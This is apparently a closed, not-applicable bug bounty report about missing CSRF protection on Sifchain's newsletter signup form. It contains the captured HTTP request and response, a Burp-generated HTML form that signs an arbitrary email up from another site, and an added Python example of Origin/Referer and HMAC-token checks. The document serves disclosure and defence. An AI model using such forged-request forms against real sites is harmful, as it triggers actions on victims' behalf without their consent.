
CSRF in newsletter form

None
Sifchain
Submitted None
Reported by ph0b0s

Vulnerability Details

Technical details and impact analysis

Cross-Site Request Forgery (CSRF)
Hi,

I can perform a CSRF attack on a victim on the newsletter to receive updates because you don't have CSRF protection ("csrf token") in the request.

Request:

```
POST / HTTP/2
Host: sifchain.finance
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 123
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close

EMAIL=gdfgdfg%40dsg.com&_mc4wp_honeypot=&_mc4wp_timestamp=1620658126&_mc4wp_form_id=204&_mc4wp_form_element_id=mc4wp-form-1
```

Response:

```
HTTP/2 200 OK
Date: Mon, 10 May 2021 14:52:32 GMT
Content-Type: text/html; charset=UTF-8
Strict-Transport-Security: max-age=15552000; includeSubDomains
Vary: Accept-Encoding
X-Hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
Host-Header: WordPress.com
Link: <https://sifchain.finance/wp-json/>; rel="https://api.w.org/"
Link: <https://sifchain.finance/wp-json/wp/v2/pages/2682>; rel="alternate"; type="application/json"
Link: <https://wp.me/Pcru4n-Hg>; rel=shortlink
X-Ac: 3.mxp _atomic_ams
Cf-Cache-Status: DYNAMIC
Cf-Request-Id: 09f85d032c0000374433a18000000001
Expect-Ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
Cf-Ray: 64d3fde509573744-MXP

<!DOCTYPE html>
<html lang="en-US" class="">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="profile" href="http://gmpg.org/xfn/11">
<link rel="pingback" href="https://sifchain.finance/xmlrpc.php">
[Snipped parts]
<div class="mc4wp-response"><div class="mc4wp-alert mc4wp-success" role="alert"><p>Thank you, your sign-up request was successful!
Please check your email inbox to confirm.</p></div>
```

PoC:

```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://sifchain.finance/" method="POST">
      <input type="hidden" name="EMAIL" value="any&#64;anyy&#46;com" />
      <input type="hidden" name="&#95;mc4wp&#95;honeypot" value="" />
      <input type="hidden" name="&#95;mc4wp&#95;timestamp" value="1620658126" />
      <input type="hidden" name="&#95;mc4wp&#95;form&#95;id" value="204" />
      <input type="hidden" name="&#95;mc4wp&#95;form&#95;element&#95;id" value="mc4wp&#45;form&#45;1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```

1. Save as a .html file.
2. Open in a browser (Chrome or Firefox) and, as you can see: "Thank you, your sign-up request was successful! Please check your email inbox to confirm"

Cheers,
Ph0b0s

## Impact

CSRF
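
A server-side check for a form POST like the one in the report, as an added example that is not part of the report and is not Sifchain's or the form plugin's code. It combines an Origin/Referer allow-list with a time-limited HMAC token bound to the visitor; the `_csrf_token` field, the `visitor_id` value (assumed to come from a cookie set when the form is rendered), the secret and all function names are assumptions.

```python
import hashlib
import hmac
import time
from urllib.parse import parse_qs, urlsplit

SECRET = b"constructed-demo-secret"             # assumption: per-site server secret
ALLOWED_ORIGINS = {"https://sifchain.finance"}  # host from the report's request
TOKEN_FIELD = "_csrf_token"                     # hypothetical field, not an mc4wp one
MAX_AGE = 3600                                  # seconds a rendered form stays valid
# Form body exactly as shown in the report's request.
REPORT_BODY = ("EMAIL=gdfgdfg%40dsg.com&_mc4wp_honeypot=&_mc4wp_timestamp=1620658126"
               "&_mc4wp_form_id=204&_mc4wp_form_element_id=mc4wp-form-1")


def issue_token(visitor_id, now=None):
    """Token put in the form at render time: '<ts>.<HMAC(visitor_id|ts)>'."""
    ts = str(int(time.time() if now is None else now))
    mac = hmac.new(SECRET, f"{visitor_id}|{ts}".encode(), hashlib.sha256).hexdigest()
    return f"{ts}.{mac}"


def source_origin(headers):
    """Origin header, else scheme://host of Referer, else None."""
    if headers.get("origin"):
        return headers["origin"]          # may be the literal string "null"
    if headers.get("referer"):
        parts = urlsplit(headers["referer"])
        return f"{parts.scheme}://{parts.netloc}"
    return None


def check_post(headers, body, visitor_id, now=None):
    """Return (accepted, reason) for a form POST."""
    headers = {k.lower(): v for k, v in headers.items()}
    src = source_origin(headers)
    if src is not None and src not in ALLOWED_ORIGINS:
        return False, f"cross-origin source {src}"
    token = parse_qs(body).get(TOKEN_FIELD, [""])[0]
    ts, _, mac = token.partition(".")
    if not (ts.isascii() and ts.isdigit() and mac):
        return False, "missing or malformed token"
    now = int(time.time() if now is None else now)
    if not 0 <= now - int(ts) <= MAX_AGE:
        return False, "token expired"
    expected = issue_token(visitor_id, int(ts)).partition(".")[2]
    if not hmac.compare_digest(mac.encode(), expected.encode()):
        return False, "token does not match visitor"
    return True, "ok"
```

The token check still applies when a request arrives with neither Origin nor Referer, which is why the two checks are layered rather than used alone.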

Report Details

Additional information and metadata

State

Closed

Substate

Not-Applicable

Submitted

Weakness

Cross-Site Request Forgery (CSRF)